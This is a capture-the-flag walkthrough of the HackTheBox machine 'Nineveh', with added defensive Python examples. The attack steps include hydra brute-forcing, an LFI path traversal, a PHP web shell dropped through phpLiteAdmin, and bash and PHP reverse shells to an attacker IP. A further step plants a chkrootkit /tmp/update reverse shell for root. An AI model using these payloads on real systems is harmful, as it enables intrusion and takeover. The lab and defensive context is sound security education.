Nineveh
Reconnaissance:
NMAP:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.43
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
| tls-alpn:
|_ http/1.1
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.43
All 1000 scanned ports on 10.10.10.43 (10.10.10.43) are in ignored states.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.43
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after: 2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 Bad Request
| tls-alpn:
|_ http/1.1
nmap shows only HTTP (TCP 80) and HTTPS (TCP 443) open. A quick nslookup against the target confirms nothing else is answering for name resolution.
┌──(kali㉿kali)-[~]
└─$ nslookup
> server 10.10.10.43
Default server: 10.10.10.43
Address: 10.10.10.43#53
First, add the domain name to the /etc/hosts file.
┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts
10.10.10.43 nineveh.htb
View the page source (Ctrl+U) to see if it gives you any other information.
Enumeration: Website - TCP 80
The site just displays a simple success page with no further information. It is the same whether visited by IP address or as nineveh.htb.
Gobuster Enumeration:
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt,html
/.html (Status: 403) [Size: 291]
/index.html (Status: 200) [Size: 178]
/.php (Status: 403) [Size: 290]
/info.php (Status: 200) [Size: 83681]
/department (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
/.php (Status: 403) [Size: 290]
/.html (Status: 403) [Size: 291]
Virtual Host Enumeration:
┌──(kali㉿kali)-[~]
└─$ gobuster vhost -k --domain nineveh.htb --append-domain -u 10.10.10.43 -w /usr/share/seclists/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
┌──(kali㉿kali)-[~]
└─$ nikto -h http://10.10.10.43
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: b2, size: 5535e4e04002a, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8046 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-12-29 22:56:25 (GMT-5) (2435 seconds)
/info.php
/department
Visit the /department directory.
http://nineveh.htb/department/login.php
I tried some basic password guessing and noticed that the error messages indicated whether the user existed. For example, when I tried admin: Invalid Password!
When I tried nineveh: invalid username
Enumeration: Website - TCP 443
This is the same whether visited by IP address or as nineveh.htb.
Gobuster Enumeration:
┌──(kali㉿kali)-[~]
└─$ gobuster dir -k -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 20 -x php,txt,html
/db (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/server-status (Status: 403) [Size: 300]
/secure_notes (Status: 301) [Size: 319] [--> https://10.10.10.43/secure_notes/]
/db returns a login for a phpLiteAdmin instance: https://nineveh.htb/db/
phpLiteAdmin is a PHP interface for interacting with SQLite databases. It's version 1.9, and searchsploit lists exploits for it: https://www.phpliteadmin.org/
/secure_notes is just an image: https://nineveh.htb/secure_notes/
┌──(kali㉿kali)-[~]
└─$ searchsploit phpliteadmin
--------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------- ---------------------------------
phpLiteAdmin - 'table' SQL Injection | php/webapps/38228.txt
phpLiteAdmin 1.1 - Multiple Vulnerabilities | php/webapps/37515.txt
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities | php/webapps/39714.txt
Examining each of these with searchsploit -x [path], the first is a version match and seems like a good way to get execution. The second also looks like it should work, if I want to do SQLi. The third one is not a version match, and the fourth has a bunch of less interesting vulnerabilities like XSS and CSRF. For all of them, I need to authenticate first.
Shell as www-data (via phpinfo.php) Port 80
Visit the /department directory: http://nineveh.htb/department/login.php
We get a login form. View the page source to see if it gives you any other information.
view-source:http://nineveh.htb/department/login.php
<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->
Brute force: Hydra
┌──(kali㉿kali)-[~]
└─$ hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form '/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!'
[80][http-post-form] host: nineveh.htb login: admin password: 1q2w3e4r5t
It found the valid password! Log into the application using the credentials we found. Visit the Notes tab. We get the following text.
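The username enumeration noticed at the login form and the hydra run against it come down to the same two server-side defects: a different error message for an unknown user than for a wrong password, and no throttling of failed attempts. The Python below is an added example, not code from the box or the writeup; it reconstructs the observed behaviour in leaky_login and contrasts it with a hardened handler. The user store, the password and the HardenedLogin class are constructed for the example; the two messages in leaky_login are the ones the writeup saw.

```python
"""Login handling: the enumeration-friendly pattern the writeup observed on
/department/login.php beside a hardened version. Added example; not the
box's code, and the account/password below are constructed."""
import hashlib
import hmac
import os
import time
from collections import defaultdict


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed user store; the real box used a hardcoded credential.
_SALT = os.urandom(16)
USERS = {"admin": (_SALT, _hash_password("correct horse battery staple", _SALT))}

# Dummy record so that an unknown username still costs one PBKDF2 run:
# without it, response time would reveal what the message no longer does.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash_password("not-a-real-password", _DUMMY_SALT)


def leaky_login(username: str, password: str) -> str:
    """What the writeup saw: two different messages, so the username can be
    confirmed before any password guessing starts."""
    if username not in USERS:
        return "invalid username"
    salt, stored = USERS[username]
    if _hash_password(password, salt) != stored:
        return "Invalid Password!"
    return "ok"


class HardenedLogin:
    """One message for every failure, constant-time comparison, and a
    per-source lockout that limits a wordlist run to a few attempts per window."""

    GENERIC_ERROR = "Invalid username or password."
    LOCKED = "Too many attempts; try again later."

    def __init__(self, max_failures=5, window_seconds=300, clock=time.monotonic):
        self.max_failures = max_failures
        self.window_seconds = window_seconds
        self.clock = clock                    # injectable for deterministic tests
        self._failures = defaultdict(list)    # source_ip -> failure timestamps

    def _recent_failures(self, source_ip: str) -> int:
        cutoff = self.clock() - self.window_seconds
        self._failures[source_ip] = [t for t in self._failures[source_ip] if t > cutoff]
        return len(self._failures[source_ip])

    def login(self, username: str, password: str, source_ip: str) -> str:
        if self._recent_failures(source_ip) >= self.max_failures:
            return self.LOCKED
        salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
        # compare_digest takes time independent of where the digests differ.
        matched = hmac.compare_digest(_hash_password(password, salt), stored)
        if not (matched and username in USERS):
            self._failures[source_ip].append(self.clock())
            return self.GENERIC_ERROR
        self._failures[source_ip].clear()
        return "ok"


if __name__ == "__main__":
    handler = HardenedLogin(max_failures=3)
    for user, pw in [("nineveh", "x"), ("admin", "x"), ("admin", "y"), ("admin", "z")]:
        print(user, "->", handler.login(user, pw, "203.0.113.9"))
```

The dummy record matters as much as the single message: if the unknown-user branch returned early without hashing, the response time would still separate real accounts from guesses. The lockout is keyed on source address, which is the simplest useful dimension; a per-account counter on top of it limits distributed guessing as well.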
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt
Have you fixed the login page yet! hardcoded username and password is really bad idea!
check your serect folder to get in! figure it out! this is your challenge
Improve the db interface.
~amrois
None of it makes much sense at this point. They do mention a secret folder; maybe we'll find that while enumerating port 443. One thing to notice is that the URL that generates the page looks like a file path. When you see a file path, the first thing you should try is an LFI. I tried and it didn't exactly work. When I try the following string
../../../../../../../etc/passwd
I'm back to the "No Note is selected" message. This leads me to believe that it is vulnerable to LFI; however, there is a check on the backend that greps for the string "ninevehNotes", since my query doesn't work without it. According to the error, we're in the /www/html/department/ directory, so we need to go three directories up. Let's try with this string.
http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../../../etc/passwd
It worked!
root:x:0:0:root:/root:/bin/bash
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
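The check inferred above fails because it tests for a substring rather than for where the resolved path ends up, so any traversal that keeps the word "ninevehNotes" in it passes. The Python below is an added example, not the box's manage.php: weak_check reconstructs the observed behaviour, and resolve_note shows the containment check that defeats the traversal. NOTES_ROOT is an assumed location for the notes directory.

```python
"""Note-file path handling for a manage.php-style page: the substring check
the writeup inferred beside a containment check. Added example, not the
box's code; NOTES_ROOT is an assumed location."""
from pathlib import Path

NOTES_ROOT = Path("/var/www/html/department/files")   # assumption, not from the box


def weak_check(notes_param: str) -> bool:
    """Reconstruction of the backend behaviour the writeup observed: the only
    requirement is that 'ninevehNotes' appears somewhere in the parameter, so
    '/ninevehNotes/../../../etc/passwd' passes while a plain traversal fails."""
    return "ninevehNotes" in notes_param


def resolve_note(notes_param: str, root: Path = NOTES_ROOT):
    """Return the path to open if and only if it is a .txt file below `root`
    after normalisation; otherwise None. Works on paths that do not exist,
    so it can be exercised offline."""
    if not notes_param or "\x00" in notes_param:
        return None
    root = root.resolve()
    # Always treat the parameter as relative to the notes directory; a leading
    # slash would otherwise make Path joining discard `root` entirely.
    candidate = (root / notes_param.lstrip("/")).resolve()
    try:
        candidate.relative_to(root)      # raises ValueError if outside root
    except ValueError:
        return None
    if candidate == root or candidate.suffix != ".txt":
        return None
    return candidate


def read_note(notes_param: str, root: Path = NOTES_ROOT) -> str:
    """Serve the note or the page's own fallback message; never the raw path."""
    path = resolve_note(notes_param, root)
    if path is None or not path.is_file():
        return "No Note is selected"
    return path.read_text()


if __name__ == "__main__":
    for p in ["ninevehNotes.txt",
              "../../../../../../../etc/passwd",
              "/ninevehNotes/../../../etc/passwd"]:
        print(f"{p!r}: weak={weak_check(p)} resolved={resolve_note(p)}")
```

resolve() normalises ".." and follows symlinks before the containment test, so a symlink planted inside the notes directory cannot escape it either; the suffix check then limits what a valid path may name. The fallback message is the one the page reports, so a failed check looks no different to the caller than an empty parameter.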
When it comes to LFIs, you usually need to chain them with another vulnerability to get remote code execution. Therefore, I'm going to start enumerating the next port to see if I can find another vulnerability to chain this one with.
Shell as www-data (via phpLiteAdmin) Port 443
Visit the page in the browser. https://nineveh.htb/
View the page source to see if it gives you any extra information. We don't get anything useful. Next, view the SSL certificate: admin@nineveh.htb
/secure_notes might be what the comment "check your secret folder" was referring to. Save the image; it might have a secret stored in it. We'll look into that later. https://nineveh.htb/secure_notes/
/db returns a login for a phpLiteAdmin instance: https://nineveh.htb/db/
I tried the default password "admin" for phpLiteAdmin v1.9, but that did not work. Let's try brute-forcing the password. First, intercept the request in Burp.
Then run hydra on the login form.
┌──(kali㉿kali)-[~]
└─$ hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt nineveh.htb https-post-form '/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect password.'
[443][http-post-form] host: nineveh.htb login: admin password: password123
Let's view the content of the Remote PHP Code Injection exploit. According to the comments in the exploit, an attacker can create a SQLite database with a .php extension and insert PHP code as text fields. When done, the attacker can execute it simply by accessing the database file from the browser.
This is exactly the vulnerability I was hoping to find! This vulnerability allows me to drop a malicious file on the server and the LFI vulnerability we found earlier allows me to call and execute my malicious file.
┌──(kali㉿kali)-[~]
└─$ searchsploit phpLiteAdmin 1.9
--------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------- ---------------------------------
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection | php/webapps/24044.txt
phpLiteAdmin 1.9.6 - Multiple Vulnerabilities | php/webapps/39714.txt
In the Create New Database section, create a new database called random.php. Then click on random.php in the Change Database section. There, create a new table called random with 1 field. In the Field parameter add the following code and change the Type to TEXT.
<?php echo system($_REQUEST ["cmd"]); ?>
Click Create. As shown in the image below, the file is created in the directory /var/tmp.
Now, let's go back to the LFI vulnerability and execute our PHP code.
http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../../../../var/tmp/random.php&cmd=ls
We have code execution! Let's intercept the request in Burp and add a reverse shell to the cmd parameter.
php -r '$sock=fsockopen("10.10.16.4",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Then add the code to the cmd parameter in Burp and URL encode it (Ctrl+U).
Setup a listener to receive the reverse shell.
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.43] 51386
$ whoami
www-data
Let's upgrade it to a partially interactive bash shell.
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
Now let's view the permissions of the user.txt file.
www-data@nineveh:/var/www/html/department$ ls -la /home/amrois/
total 32
drwxr-xr-x 4 amrois amrois 4096 Jul 3 2017 .
drwxr-xr-x 3 root root 4096 Jul 2 2017 ..
-rw------- 1 amrois amrois 0 Jul 2 2017 .bash_history
-rw-r--r-- 1 amrois amrois 220 Jul 2 2017 .bash_logout
-rw-r--r-- 1 amrois amrois 3765 Jul 2 2017 .bashrc
drwx------ 2 amrois amrois 4096 Jul 3 2017 .cache
-rw-r--r-- 1 amrois amrois 655 Jul 2 2017 .profile
drwxr-xr-x 2 amrois amrois 4096 Jul 2 2017 .ssh
-rw------- 1 amrois amrois 33 Jul 2 2017 user.txt
We're running as www-data, so we don't have rights to read the file. We need to escalate our privileges.
Priv: www-data -> root
Let's transfer the LinPEAS script from our attack machine to the target machine. On the attack machine, start a web server in the directory where the script resides.
┌──(kali㉿kali)-[/opt/linpeas]
└─$ python -m SimpleHTTPServer 5555
On the target machine, change to the /tmp directory, where we have write privileges, and download the LinPEAS script.
www-data@nineveh:/var/www/html/department$ cd /tmp
www-data@nineveh:/tmp$ wget http://10.10.16.4:5555/linpeas.sh
Give it execute privileges.
www-data@nineveh:/tmp$ chmod +x linpeas.sh
Run the script.
www-data@nineveh:/tmp$ ./linpeas.sh
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] af_packet
CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[3] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash
root:x:0:0:root:/root:/bin/bash
In our nmap scan, port 22 was not reported to be open; however, the LinPEAS script reports it as listening on localhost. I'm not sure what to do with this piece of information, but I'll keep it at the back of my mind in case I don't find any other way to escalate privileges.
Next, let's try pspy. If you don't have the script, you can download it from the following github repository.
Every minute or so chkrootkit is being run. I've never seen that on a machine before, so I googled it and found out that it is a program intended to help system administrators check their systems for known rootkits. Next, I googled "chkrootkit privilege escalation" and landed on this
There is a privilege escalation vulnerability in old versions of this software that will run any executable file named /tmp/update as root. Therefore, all we have to do is create an "update" file that contains a reverse shell and wait for the scheduled task to give us a shell with root privileges.
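From the defending side, the lesson of this step is a root-run scheduled job trusting a file name in a directory every user can write to. The Python below is an added audit helper, not part of the writeup or of chkrootkit: it reports whether a directory is world-writable and whether a file there with a name a privileged job would execute is a symlink, non-root-owned, writable by others, or executable. The file name update is the one the writeup gives; the lasting fix is an updated chkrootkit and jobs that never execute from /tmp, with this check serving as a detection in the meantime.

```python
"""Audit helper for the chkrootkit trap described above: a root-run job that
executes a file under a world-writable directory. Added example, not part of
the writeup or of chkrootkit; /tmp/update is the name the writeup gives."""
import os
import stat
import tempfile
from pathlib import Path


def risky_trigger_files(directory, names=("update",)):
    """Return (path, reason) pairs for files in `directory` whose name matches
    one a privileged job would execute, with the reasons it is dangerous."""
    findings = []
    for name in names:
        path = Path(directory) / name
        try:
            st = path.lstat()          # lstat: a symlink is itself a finding
        except FileNotFoundError:
            continue
        reasons = []
        if stat.S_ISLNK(st.st_mode):
            reasons.append("is a symlink")
        if st.st_uid != 0:
            reasons.append(f"owned by uid {st.st_uid}, not root")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("group/world writable")
        if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
            reasons.append("executable")
        if reasons:
            findings.append((str(path), "; ".join(reasons)))
    return findings


def directory_is_shared(directory) -> bool:
    """True when anyone can create files in `directory` (the /tmp situation)."""
    return bool(os.stat(directory).st_mode & stat.S_IWOTH)


def plant_demo(plant=True) -> str:
    """Constructed scenario for a self-contained run: a fresh temporary
    directory, optionally holding an executable, world-writable 'update'."""
    d = tempfile.mkdtemp(prefix="chkrootkit-audit-")
    if plant:
        p = Path(d) / "update"
        p.write_text("#!/bin/sh\n# placeholder created by plant_demo()\n")
        p.chmod(0o777)
    return d


if __name__ == "__main__":
    for target in ("/tmp", plant_demo()):
        print(f"{target}: world-writable={directory_is_shared(target)}")
        for path, reason in risky_trigger_files(target):
            print(f"  {path}: {reason}")
```

Run it from cron with the same cadence as the job it watches and alert on any finding; on a host where the vulnerable chkrootkit cannot be replaced immediately, an executable named update appearing in /tmp is the indicator of this exact technique.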
I'll write a simple reverse shell to /tmp/update and make it executable:
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 443
amrois@nineveh:/tmp$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.16.4/443 0>&1' > update
amrois@nineveh:/tmp$ chmod +x update
The next time chkrootkit runs, I get a shell:
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.43] 34392
root@nineveh:~# cat root.txt
3e49e3c7----------------------------
root@nineveh:~# cat /home/amrois/user.txt
0349e71f-----------------------------